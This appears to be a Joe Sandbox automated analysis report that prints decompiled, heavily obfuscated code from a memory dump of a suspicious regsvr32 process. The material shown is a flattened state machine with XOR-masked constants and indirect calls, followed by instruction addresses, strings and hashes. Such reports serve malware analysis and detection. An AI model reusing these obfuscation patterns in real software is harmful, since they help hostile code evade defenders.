							_t1531 = 0x2bef0;
							while(1) {
								_t1375 = 0xf;
								goto L2;
							}
						}
						if(__eflags == 0) {
							_v180 = 0x833e64;
							_v180 = _v180 * 0x2f;
							_v180 = _v180 ^ 0x181c0d71;
							_t1172 = E04F69BDE();
							_v80 = _t1172;
							_t1531 = 0x40525;
							while(1) {
								_t1375 = 0xf;
								goto L2;
							}
						}
						__eflags = _t1531 - 0xcbd7b;
						if(__eflags == 0) {
							_v184 = 0x6242a2;
							_t1390 = 0x27;
							_v184 = _v184 / _t1390;
							_v184 = _v184 + 0xf638;
							_v184 = _v184 ^ 0x06ceb472;
							_v184 = _v184 ^ 0x06c2cfdf;
							_t1172 = E04F80406(__eflags);
							__eflags = _t1172;
							if(_t1172 == 0) {
								goto L117;
							}
							_t1531 = 0x7f76f;
							while(1) {
								_t1375 = 0xf;
								goto L2;
							}
						}
						__eflags = _t1531 - 0xccc39;
						if(_t1531 == 0xccc39) {
							_v184 = 0x433505;
							_v184 = _v184 * 0x23;
							_v184 = _v184 + 0xffffe70c;
							_v184 = _v184 << 7;
							_t1169 =  &_v184;
							 *_t1169 = _v184 ^ 0x981e056f;
							__eflags =  *_t1169;
							_t1172 = E04F77915();
							goto L117;
						}
						__eflags = _t1531 - 0xd6604;
						if(_t1531 == 0xd6604) {
							_v180 = 0xdb27d8;
							_t1531 = 0xc4b00;
							_v180 = _v180 * 0x76;
							_v180 = _v180 * 0x25;
							_v180 = _v180 ^ 0x98950c24;
							_t1172 = _v180;
							_v84 = _t1172;
							goto L2;
						}
						__eflags = _t1531 - 0xe0ef5;
						if(_t1531 != 0xe0ef5) {
							goto L112;
						}
						_v180 = 0xdb2722;
						_v180 = _v180 | 0xfc3661cc;
						_v180 = _v180 ^ 0x253663ee;
						_v180 = _v180 ^ 0xd9cd7a95;
						_t1172 = E04F7FC6F();
						_t1531 = 0x7c4cd;
						while(1) {
							_t1375 = 0xf;
							goto L2;
						}
					}
					if(__eflags == 0) {
						_v184 = 0xc28eba;
						_v184 = _v184 >> 8;
						_v184 = _v184 >> 3;
						_v184 = _v184 + 0xa98b;
						_v184 = _v184 ^ 0x000d900c;
						_v180 = 0xa28eb9;
						_v180 = _v180 ^ 0x3dbabf06;
						_v180 = _v180 ^ 0x3d1f6c03;
						_t1172 = E04F7D81A();
						_t1531 = 0x231d2;
						while(1) {
							_t1375 = 0xf;
							goto L2;
						}
					}
					__eflags = _t1531 - 0xad75f;
					if(__eflags > 0) {
						__eflags = _t1531 - 0xae85e;
						if(_t1531 == 0xae85e) {
							_v184 = 0x2a3c1b;
							_v184 = _v184 | 0x7fefffed;
							_v184 = _v184 ^ 0x7fe7e011;
							_v180 = 0x99ef1a;
							_v180 = _v180 ^ 0xe421bab3;
							_v180 = _v180 ^ 0xe4b02d83;
							_t1515 = _v180;
							_t1172 = E04F7FFAC(_v180,  &_v44);
							_pop(_t1427);
							__eflags = _t1172;
							if(_t1172 == 0) {
								_t1172 = _v20;
								__eflags = _t1172;
								if(_t1172 == 0) {
									_v176 = 0x33b5a5;
									_v176 = _v176 ^ 0x208d21be;
									_v176 = _v176 | 0x2752a569;
									_v176 = _v176 ^ 0x27f0160e;
									_v184 = 0xac19c7;
									_push(_t1427);
									_v184 = _v184 * 0x3c;
									_v184 = _v184 * 0x39;
									_v184 = _v184 ^ 0xfb262d5e;
									_v172 = 0x3adf0f;
									_v172 = _v172 ^ 0xff4f72f0;
									_v172 = _v172 + 0xdfea;
									_v172 = _v172 ^ 0xff7ee7a6;
									_v180 = 0xa4d5af;
									_v180 = _v180 >> 0xc;
									_v180 = _v180 ^ 0x000db1ed;
									_v168 = 0xd36b8a;
									_v168 = _v168 | 0xd1477d67;
									_v168 = _v168 << 0xc;
									_t820 =  &_v168;
									 *_t820 = _v168 ^ 0x77f00420;
									__eflags =  *_t820;
									_t1528 = E04F6F826(_v180, _t1427, _v168);
									_t1560 = _t1560 + 0xc;
									_t1172 = _v20;
								}
								__eflags = _t1172 - 1;
								if(_t1172 == 1) {
									_v184 = 0x77c14b;
									_v184 = _v184 >> 0xf;
									_t1428 = 0x2f;
									_push(_t1428);
									_v184 = _v184 * 0x3f;
									_v184 = _v184 >> 1;
									_v184 = _v184 ^ 0x0009168f;
									_v176 = 0xf0d424;
									_v176 = _v176 * 0x6e;
									_v176 = _v176 + 0xffff8374;
									_v176 = _v176 ^ 0x677e4136;
									_v172 = 0x354468;
									_v172 = _v172 >> 5;
									_v172 = _v172 * 0x4c;
									_v172 = _v172 ^ 0x007c228d;
									_v180 = 0xb1a3d6;
									_t1342 = _v180;
									_t1515 = _t1342 % _t1428;
									_v180 = _t1342 / _t1428;
									_v180 = _v180 * 0x48;
									_v180 = _v180 ^ 0x01106f30;
									_v168 = 0xa3cf00;
									_v168 = _v168 ^ 0x84f316a7;
									_v168 = _v168 ^ 0x40403f5c;
									_t867 =  &_v168;
									 *_t867 = _v168 ^ 0xc41093cb;
									__eflags =  *_t867;
									_t1172 = E04F6F826(_v180, _t1428, _v168);
									_t1560 = _t1560 + 0xc;
									_t1528 = _t1172;
								}
							} else {
								_t1528 = 0;
							}
							_t1373 = 0x8567c;
							_t1531 = 0x185f8;
							while(1) {
								_t1375 = 0xf;
								goto L2;
							}
						}
						__eflags = _t1531 - 0xaeca4;
						if(_t1531 == 0xaeca4) {
							_v184 = 0x8ff49c;
							_v184 = _v184 << 4;
							_v184 = _v184 >> 2;
							_v184 = _v184 << 9;
							_v184 = _v184 ^ 0x7fa62a8d;
							_t1172 = E04F79D9D();
							__eflags = _t1172;
							if(_t1172 == 0) {
								goto L117;
							}
							_t1531 = 0x7cf16;
							while(1) {
								_t1375 = 0xf;
								goto L2;
							}
						}
						__eflags = _t1531 - 0xc4b00;
						if(_t1531 == 0xc4b00) {
							_v172 = 0x2c54b6;
							_t1312 = _v172;
							_t1531 = 0x8567c;
							_t1431 = 0x5e;
							_t1515 = _t1312 % _t1431;
							_v172 = _t1312 / _t1431;
							_v172 = _v172 << 8;
							_v172 = _v172 ^ 0x00789c10;
							_t1172 = _v172;
							_v132 = _t1172;
							while(1) {
								_t1375 = 0xf;
								goto L2;
							}
						}
						__eflags = _t1531 - 0xc9369;
						if(_t1531 != 0xc9369) {
							goto L112;
						}
						_v180 = 0x7cf778;
						_v180 = _v180 | 0xa7da6e5a;
						_v180 = _v180 ^ 0xa7f2da63;
						_t1172 = E04F80559(_t1515);
						asm("sbb esi, esi");
						_t1535 =  ~_t1172 & 0xfffd395e;
						__eflags = _t1535;
						goto L75;
					}
					if(__eflags == 0) {
						_v176 = 0x55fe05;
						_t1432 = 0x22;
						_v176 = _v176 * 0x35;
						_v176 = _v176 + 0x2afd;
						_v176 = _v176 * 0x22;
						_v176 = _v176 ^ 0x5d5002c4;
						_v184 = 0x2c1be7;
						_v184 = _v184 + 0xffff74d8;
						_t1317 = _v184;
						_t1515 = _t1317 % _t1432;
						_v184 = _t1317 / _t1432;
						_v184 = _v184 + 0xffffe56a;
						_v184 = _v184 ^ 0x00005b9c;
						_t1172 = E04F77EB9();
						__eflags = _t1172;
						if(_t1172 == 0) {
							goto L117;
						}
						_t1531 = 0xaeca4;
						while(1) {
							_t1375 = 0xf;
							goto L2;
						}
					}
					__eflags = _t1531 - 0x86464;
					if(_t1531 == 0x86464) {
						_v172 = 0x2f0fb;
						_v172 = _v172 + 0xffff7f54;
						_v172 = _v172 * 0x2a;
						_v172 = _v172 ^ 0x0069acfb;
						E04F76F79();
						_v172 = 0x5a772d;
						_v172 = _v172 + 0xb241;
						_v172 = _v172 >> 0xb;
						_v172 = _v172 ^ 0x000b4547;
						_v180 = 0x2808f;
						_v180 = _v180 * 0x47;
						_v180 = _v180 ^ 0x00b1374d;
						_t1172 = E04F73622();
						asm("sbb esi, esi");
						_t1531 = ( ~_t1172 & 0xfffc3f3f) + 0x7057a;
						while(1) {
							_t1375 = 0xf;
							goto L2;
						}
					}
					__eflags = _t1531 - 0x90a26;
					if(__eflags == 0) {
						_v184 = 0xcd3325;
						_v184 = _v184 * 0x52;
						_v184 = _v184 + 0xffff71bb;
						_v184 = _v184 >> 4;
						_v184 = _v184 ^ 0x041baf37;
						_v176 = 0xe5c3b2;
						_v176 = _v176 >> 2;
						_v176 = _v176 + 0x510;
						_v176 = _v176 ^ 0x0032ac05;
						_v172 = 0xbe50c1;
						_v172 = _v172 * 0x32;
						_v172 = _v172 | 0xd443442c;
						_v172 = _v172 ^ 0xf56f4893;
						_t1515 = _v176;
						_t1172 = E04F7E4B2(_v184, _v176, __eflags, _v172, _v140);
						_t1531 = 0x26342;
						continue;
					}
					__eflags = _t1531 - 0x9e5f1;
					if(_t1531 == 0x9e5f1) {
						_v180 = 0xbb8131;
						_v180 = _v180 / _t1375;
						_v180 = _v180 | 0x619c7739;
						_v180 = _v180 ^ 0x6193fe33;
						_v184 = 0x11db70;
						_t1436 = 0x38;
						_v184 = _v184 / _t1436;
						_v184 = _v184 ^ 0x000aedf6;
						_v172 = 0xf82344;
						_v172 = _v172 ^ 0x88bec899;
						_v172 = _v172 ^ 0x8848ea88;
						_t1172 = E04F6BB44(_v180, _v184, _v172);
						goto L117;
					}
					__eflags = _t1531 - 0xac0c2;
					if(_t1531 != 0xac0c2) {
						goto L112;
					}
					_v184 = 0xf0075c;
					_v184 = _v184 + 0x91ca;
					_v184 = _v184 | 0xff85f7a7;
					_v184 = _v184 ^ 0xfff16a1f;
					E04F79D9D();
					_v180 = 0x7f7658;
					_t1373 = 0x45316;
					_v180 = _v180 | 0x674c2c9a;
					_v180 = _v180 ^ 0x67789f52;
					_v168 = 0x130b9d;
					_v168 = _v168 + 0xffff864d;
					_v168 = _v168 + 0xffff65b5;
					_v168 = _v168 ^ 0x00133da8;
					_v184 = 0x9c1b72;
					_push(_t1375);
					_v184 = _v184 * 0x16;
					_v184 = _v184 + 0xfffff458;
					_v184 = _v184 << 4;
					_v184 = _v184 ^ 0xd6a45013;
					_v172 = 0x134aa2;
					_v172 = _v172 >> 5;
					_v172 = _v172 >> 0xf;
					_v172 = _v172 ^ 0x00002711;
					_v176 = 0x9cdcac;
					_v176 = _v176 | 0xeddf9ef7;
					_v176 = _v176 + 0xffff5942;
					_v176 = _v176 ^ 0xeddf7661;
					_t1172 = E04F6F826(_v172, _t1375, _v176);
					_t1560 = _t1560 + 0xc;
					_t1528 = _t1172;
					goto L19;
				}
			}

0x04f66c64
0x04f66c6d
0x04f66c75
0x04f66c7a
0x04f66c84
0x04f66c88
0x04f66c8a
0x04f66c8b
0x04f66c8b
0x04f66c8b
0x04f66c8d
0x00000000
0x00000000
0x04f66c93
0x04f67864
0x04f67874
0x04f67879
0x04f67883
0x04f67888
0x04f67892
0x04f67899
0x04f6789d
0x04f678a5
0x04f678ad
0x04f678b5
0x04f678ba
0x04f678c2
0x04f678d2
0x04f678d8
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f66c99
0x04f66c9f
0x04f670eb
0x04f670f1
0x04f67568
0x04f6756e
0x04f6780d
0x04f67815
0x04f6781d
0x04f67825
0x04f6782d
0x04f67835
0x04f6783d
0x04f67845
0x04f67855
0x04f6785a
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67574
0x04f6757a
0x04f67799
0x04f677a3
0x04f677ab
0x04f677b9
0x04f677bc
0x04f677c0
0x04f677c8
0x04f677d5
0x04f677d9
0x04f677de
0x04f677e6
0x04f677f6
0x04f677fb
0x04f677fd
0x04f68453
0x04f6845a
0x04f6845a
0x04f67803
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67580
0x04f67586
0x04f675e9
0x04f675f3
0x04f675fb
0x04f67607
0x04f6760a
0x04f6760e
0x04f67616
0x04f67624
0x04f67625
0x04f6762b
0x04f67630
0x04f67635
0x04f6763d
0x04f67645
0x04f6764d
0x04f67655
0x04f6765d
0x04f67672
0x04f6767a
0x04f67693
0x04f67698
0x04f6769b
0x04f6769d
0x04f67770
0x04f67777
0x04f6777a
0x04f67786
0x04f67788
0x04f6778f
0x04f6778f
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f6778a
0x04f6778d
0x04f67766
0x04f67766
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x00000000
0x04f6778d
0x04f6777c
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f676a3
0x04f676ad
0x04f676b2
0x04f676ba
0x04f676c2
0x04f676c7
0x04f676cf
0x04f676d7
0x04f676df
0x04f676e4
0x04f676e9
0x04f676f1
0x04f676f9
0x04f67701
0x04f67707
0x04f67708
0x04f6770a
0x04f6770b
0x04f67714
0x04f67718
0x04f67720
0x04f67728
0x04f67730
0x04f67735
0x04f6773d
0x04f6773d
0x04f6773d
0x04f6775a
0x04f6775f
0x04f67762
0x04f67764
0x00000000
0x04f67764
0x04f67588
0x04f6758e
0x04f68347
0x04f68347
0x04f6834d
0x00000000
0x00000000
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67594
0x04f675a4
0x04f675a9
0x04f675af
0x04f675b7
0x04f675c3
0x04f675c6
0x04f675ca
0x04f675da
0x04f675df
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f670f7
0x04f6723d
0x04f67247
0x04f6724f
0x04f67257
0x04f6725f
0x04f6726d
0x04f67272
0x04f6727d
0x04f6727e
0x04f67282
0x04f6728a
0x04f67292
0x04f67297
0x04f6729c
0x04f672a4
0x04f672b2
0x04f672ba
0x04f672c2
0x04f672c6
0x04f672c7
0x04f672cc
0x04f672dd
0x04f672e5
0x04f672ed
0x04f672f2
0x04f672fa
0x04f67302
0x04f6730a
0x04f67312
0x04f6731a
0x04f67322
0x04f6732a
0x04f67332
0x04f6733a
0x04f67342
0x04f6734a
0x04f67352
0x04f6735a
0x04f6735e
0x04f6735f
0x04f67364
0x04f67375
0x04f6737b
0x04f67383
0x04f6738b
0x04f67393
0x04f6739b
0x04f673aa
0x04f673ab
0x04f673af
0x04f673b7
0x04f673bf
0x04f673cd
0x04f673d1
0x04f673d9
0x04f673e1
0x04f673e6
0x04f673ee
0x04f6740f
0x04f67414
0x04f6741e
0x04f67420
0x04f67428
0x04f67436
0x04f6743e
0x04f67444
0x04f67451
0x04f67455
0x04f6745d
0x04f67465
0x04f6746d
0x04f6747a
0x04f6747e
0x04f67486
0x04f67493
0x04f67497
0x04f6749f
0x04f674a7
0x04f674c3
0x04f674c8
0x04f674d3
0x04f674df
0x04f674e4
0x04f674ea
0x04f674ef
0x04f674f7
0x04f674ff
0x04f67504
0x04f6750c
0x04f67514
0x04f6751c
0x04f67524
0x04f6752c
0x04f67538
0x04f6753b
0x04f6753f
0x04f6755b
0x04f67560
0x00000000
0x04f67560
0x04f670fd
0x04f67103
0x04f671ff
0x04f6720f
0x04f67212
0x04f67216
0x04f6721e
0x04f6722a
0x04f6722f
0x04f67233
0x00000000
0x04f67233
0x04f67109
0x04f6710f
0x04f671c5
0x04f671d5
0x04f671d8
0x04f671dc
0x04f671e4
0x04f671f0
0x04f671f5
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67115
0x04f6711b
0x04f67179
0x04f67181
0x04f67189
0x04f67191
0x04f67199
0x04f671a1
0x04f671a6
0x04f671b6
0x04f671bb
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f6711d
0x04f67123
0x00000000
0x00000000
0x04f67129
0x04f67131
0x04f67139
0x04f67141
0x04f6714e
0x04f67152
0x04f67162
0x04f67167
0x04f67169
0x00000000
0x00000000
0x04f6716f
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f66ca5
0x04f67082
0x04f6708a
0x04f67092
0x04f6709a
0x04f670a2
0x04f670aa
0x04f670af
0x04f670b7
0x04f670bf
0x04f670cf
0x04f670d8
0x04f670e0
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f66cab
0x04f66cb1
0x04f66f13
0x04f66f19
0x04f68358
0x04f68362
0x04f6836e
0x04f6836f
0x04f68373
0x04f6837b
0x04f68389
0x04f6838d
0x04f68395
0x04f6839a
0x04f683aa
0x00000000
0x04f683aa
0x04f66f1f
0x04f66f25
0x04f67045
0x04f6704d
0x04f6705a
0x04f67063
0x04f67067
0x04f67073
0x04f67078
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f66f2b
0x04f66f31
0x04f66fff
0x04f67009
0x04f67017
0x04f6701a
0x04f6701e
0x04f67026
0x04f67032
0x04f67037
0x04f6703b
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f66f37
0x04f66f3d
0x00000000
0x00000000
0x04f66f43
0x04f66f53
0x04f66f56
0x04f66f5a
0x04f66f6b
0x04f66f74
0x04f66f7c
0x04f66f84
0x04f66f89
0x04f66f91
0x04f66f99
0x04f66fa1
0x04f66fa9
0x04f66fb1
0x04f66fb6
0x04f66fbe
0x04f66fc6
0x04f66fce
0x04f66fe6
0x04f66feb
0x04f66fee
0x04f66ff5
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f66cb7
0x04f66e9c
0x04f66ea6
0x04f66eab
0x04f66eb3
0x04f66ebb
0x04f66ec3
0x04f66ece
0x04f66ed2
0x04f66eda
0x04f66ee2
0x04f66eea
0x04f66eea
0x04f66eea
0x04f66f02
0x04f66f09
0x04f66f09
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f66cc3
0x04f66dc9
0x04f66dd3
0x04f66dde
0x04f66ddf
0x04f66de3
0x04f66de8
0x04f66df0
0x04f66dfe
0x04f66e02
0x04f66e07
0x04f66e0f
0x04f66e1f
0x04f66e24
0x04f66e26
0x04f66e28
0x04f66e39
0x04f66e3a
0x04f66e43
0x04f66e47
0x04f66e4c
0x04f66e54
0x04f66e64
0x04f66e68
0x04f66e70
0x04f66e74
0x04f66e76
0x04f66e7a
0x04f66e7a
0x04f66e7a
0x04f66e8a
0x04f66e91
0x04f66e91
0x04f66e92
0x00000000
0x04f66e92
0x04f66ccf
0x04f66dbf
0x00000000
0x04f66dbf
0x04f66cdb
0x04f66d8f
0x04f66d97
0x04f66d9f
0x04f66da4
0x04f66db0
0x04f66db5
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f66ce7
0x00000000
0x00000000
0x04f66ced
0x04f66cf7
0x04f66cfc
0x04f66d04
0x04f66d09
0x04f66d11
0x04f66d19
0x04f66d1e
0x04f66d26
0x04f66d2e
0x04f66d3c
0x04f66d41
0x04f66d4b
0x04f66d4e
0x04f66d56
0x04f66d70
0x04f66d75
0x04f66d7c
0x04f66d84
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f678e2
0x04f678e8
0x04f67eb9
0x04f67ebf
0x04f67fd8
0x04f67fde
0x04f68238
0x04f68248
0x04f6824b
0x04f6824f
0x04f68257
0x04f6825f
0x04f68267
0x04f6826f
0x04f6827f
0x04f68286
0x04f68288
0x04f682e2
0x04f682f1
0x04f682f4
0x04f682f8
0x04f68300
0x04f6830e
0x04f6830f
0x04f6831b
0x04f6831f
0x04f6832f
0x04f68334
0x04f68336
0x04f68342
0x00000000
0x04f68342
0x04f68338
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f6828a
0x04f68292
0x04f6829a
0x04f682a2
0x04f682aa
0x04f682b0
0x04f682b1
0x04f682b3
0x04f682b7
0x04f682bc
0x04f682cc
0x04f682d5
0x04f682d7
0x04f67bf7
0x04f67bf7
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67fe4
0x04f67fea
0x04f68115
0x04f6811d
0x04f68122
0x04f6812f
0x04f68133
0x04f6813f
0x04f68144
0x04f68156
0x04f6815b
0x04f68166
0x04f6816a
0x04f68172
0x04f6817f
0x04f68182
0x04f68186
0x04f6818e
0x04f68196
0x04f6819e
0x04f681a9
0x04f681aa
0x04f681b0
0x04f681b8
0x04f681c0
0x04f681c5
0x04f681ca
0x04f681cf
0x04f681d7
0x04f681e4
0x04f681ee
0x04f681f6
0x04f68219
0x04f6821e
0x04f68225
0x04f6822d
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67ff0
0x04f67ff6
0x00000000
0x00000000
0x04f67ffc
0x04f67ffe
0x04f6810e
0x04f6810e
0x00000000
0x04f6810e
0x04f68004
0x04f6800c
0x04f68011
0x04f68016
0x04f6801e
0x04f6802a
0x04f6802f
0x04f68039
0x04f68043
0x04f6804b
0x04f68053
0x04f68061
0x04f68064
0x04f6806d
0x04f68071
0x04f68079
0x04f68081
0x04f68089
0x04f68091
0x04f680a4
0x04f680ab
0x04f680af
0x04f680bb
0x04f680c5
0x04f680cd
0x04f680d2
0x04f680d7
0x04f680df
0x04f680ed
0x04f680f0
0x04f680f4
0x04f680f9
0x04f680f9
0x04f680f9
0x04f68109
0x00000000
0x04f68109
0x04f680b1
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67ec5
0x04f67fa8
0x04f67fb5
0x04f67fb9
0x04f67fc5
0x04f67fca
0x04f67fce
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67ecb
0x04f67ed1
0x04f67f5e
0x04f67f6e
0x04f67f71
0x04f67f75
0x04f67f7d
0x04f67f85
0x04f67f91
0x04f67f96
0x04f67f98
0x00000000
0x00000000
0x04f67f9e
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67ed7
0x04f67edd
0x04f68424
0x04f68431
0x04f68435
0x04f6843d
0x04f68442
0x04f68442
0x04f68442
0x04f6844e
0x00000000
0x04f6844e
0x04f67ee3
0x04f67ee9
0x04f67f2a
0x04f67f32
0x04f67f3c
0x04f67f45
0x04f67f49
0x04f67f51
0x04f67f55
0x00000000
0x04f67f55
0x04f67eeb
0x04f67ef1
0x00000000
0x00000000
0x04f67ef7
0x04f67eff
0x04f67f07
0x04f67f0f
0x04f67f1b
0x04f67f20
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f678ee
0x04f67e68
0x04f67e70
0x04f67e75
0x04f67e7a
0x04f67e82
0x04f67e8a
0x04f67e92
0x04f67e9a
0x04f67eaa
0x04f67eaf
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f678f4
0x04f678fa
0x04f67ba2
0x04f67ba8
0x04f67c6f
0x04f67c7e
0x04f67c86
0x04f67c8e
0x04f67c96
0x04f67c9e
0x04f67ca6
0x04f67caf
0x04f67cb4
0x04f67cb5
0x04f67cb7
0x04f67cc0
0x04f67cc7
0x04f67cc9
0x04f67ccf
0x04f67cd7
0x04f67cdf
0x04f67ce7
0x04f67cef
0x04f67cfc
0x04f67cfd
0x04f67d06
0x04f67d0a
0x04f67d12
0x04f67d1a
0x04f67d22
0x04f67d2a
0x04f67d32
0x04f67d3a
0x04f67d3f
0x04f67d47
0x04f67d4f
0x04f67d57
0x04f67d5c
0x04f67d5c
0x04f67d5c
0x04f67d7e
0x04f67d80
0x04f67d83
0x04f67d83
0x04f67d8a
0x04f67d8d
0x04f67d93
0x04f67d9d
0x04f67da9
0x04f67daa
0x04f67dab
0x04f67daf
0x04f67db3
0x04f67dbb
0x04f67dc8
0x04f67dcc
0x04f67dd4
0x04f67ddc
0x04f67de4
0x04f67dee
0x04f67df2
0x04f67dfa
0x04f67e02
0x04f67e06
0x04f67e08
0x04f67e11
0x04f67e15
0x04f67e1d
0x04f67e25
0x04f67e2d
0x04f67e35
0x04f67e35
0x04f67e35
0x04f67e52
0x04f67e57
0x04f67e5a
0x04f67e5a
0x04f67cb9
0x04f67cb9
0x04f67cb9
0x04f67e5c
0x04f67e5e
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67bae
0x04f67bb4
0x04f67c35
0x04f67c3d
0x04f67c42
0x04f67c47
0x04f67c4c
0x04f67c58
0x04f67c5d
0x04f67c5f
0x00000000
0x00000000
0x04f67c65
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67bb6
0x04f67bbc
0x04f67c02
0x04f67c0c
0x04f67c10
0x04f67c14
0x04f67c15
0x04f67c17
0x04f67c1b
0x04f67c20
0x04f67c28
0x04f67c2c
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67bbe
0x04f67bc4
0x00000000
0x00000000
0x04f67bca
0x04f67bd2
0x04f67bda
0x04f67be6
0x04f67bef
0x04f67bf1
0x04f67bf1
0x00000000
0x04f67bf1
0x04f67900
0x04f67b2a
0x04f67b3b
0x04f67b3c
0x04f67b40
0x04f67b4d
0x04f67b51
0x04f67b59
0x04f67b61
0x04f67b69
0x04f67b6d
0x04f67b6f
0x04f67b73
0x04f67b7b
0x04f67b8b
0x04f67b90
0x04f67b92
0x00000000
0x00000000
0x04f67b98
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67906
0x04f6790c
0x04f67aa6
0x04f67aae
0x04f67abb
0x04f67abf
0x04f67acb
0x04f67ad0
0x04f67ad8
0x04f67ae0
0x04f67ae5
0x04f67aed
0x04f67afa
0x04f67afe
0x04f67b0e
0x04f67b17
0x04f67b1f
0x04f66c88
0x04f66c8a
0x00000000
0x04f66c8a
0x04f66c88
0x04f67912
0x04f67918
0x04f67a21
0x04f67a2e
0x04f67a32
0x04f67a3a
0x04f67a3f
0x04f67a47
0x04f67a4f
0x04f67a54
0x04f67a5c
0x04f67a64
0x04f67a71
0x04f67a75
0x04f67a7d
0x04f67a8d
0x04f67a95
0x04f67a9c
0x00000000
0x04f67a9c
0x04f6791e
0x04f67924
0x04f683b4
0x04f683c6
0x04f683cc
0x04f683d4
0x04f683dc
0x04f683e8
0x04f683eb
0x04f683ef
0x04f683f7
0x04f683ff
0x04f68407
0x04f6841b
0x00000000
0x04f68421
0x04f6792a
0x04f67930
0x00000000
0x00000000
0x04f67936
0x04f6793e
0x04f67946
0x04f6794e
0x04f6795a
0x04f6795f
0x04f67967
0x04f6796c
0x04f67974
0x04f6797c
0x04f67984
0x04f6798c
0x04f67994
0x04f6799c
0x04f679a9
0x04f679aa
0x04f679ae
0x04f679b6
0x04f679bb
0x04f679c3
0x04f679cb
0x04f679d0
0x04f679d5
0x04f679dd
0x04f679e5
0x04f679ed
0x04f679f5
0x04f67a12
0x04f67a17
0x04f67a1a
0x00000000
0x04f67a1a

Strings

6A~g, xrefs: 04F67DD4
&, xrefs: 04F66E92
&, xrefs: 04F67766
^, xrefs: 04F6778F
^, xrefs: 04F67BA2
&, xrefs: 04F67912
,Lk, xrefs: 04F674C8
0Eb, xrefs: 04F6706F
+6, xrefs: 04F68004
Z, xrefs: 04F67342
hD5, xrefs: 04F67DDC
c6%, xrefs: 04F67F07
:z, xrefs: 04F6749F
\y, xrefs: 04F68186
\?@@, xrefs: 04F67E2D

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: &$&$&$+6$,Lk$0Eb$6A~g$:z$Z$\?@@$\y$^$^$hD5$c6%
API String ID: 0-654049271
Opcode ID: 1730a8e13f1ddd83543d72972d534414ef49ccc6db3b90a18a63f83b4d96f495
Instruction ID: 6cad0fc3fa791f35c1ce07914a9c1533067f35bd5bb997542ccae9e0c9f8c2e0
Opcode Fuzzy Hash: 1730a8e13f1ddd83543d72972d534414ef49ccc6db3b90a18a63f83b4d96f495
Instruction Fuzzy Hash: AED204729093028FD358DF25D58980FBBE1BBD8748F00492DF4DAA6260D774DA4A8F97

Uniqueness

Uniqueness Score: -1.00%

Function 10005FD0 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 305
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E10005FD0() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t55;
				void* _t56;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				int _t83;
				intOrPtr _t94;
				signed int _t96;
				void* _t99;
				void* _t102;
				intOrPtr _t106;
				void* _t125;
				intOrPtr* _t127;
				int _t128;
				signed int _t130;
				long _t134;
				signed int _t136;
				signed int _t138;
				signed int _t144;
				void* _t151;
				void* _t152;
				struct HINSTANCE__* _t153;
				signed int _t154;
				void* _t157;
				void* _t161;
				void* _t162;
				struct HRSRC__* _t163;
				signed int _t164;
				void* _t165;
				signed int _t169;
				void* _t170;
				signed int _t172;
				signed int _t177;
				signed int _t184;
				void* _t190;
				void* _t194;
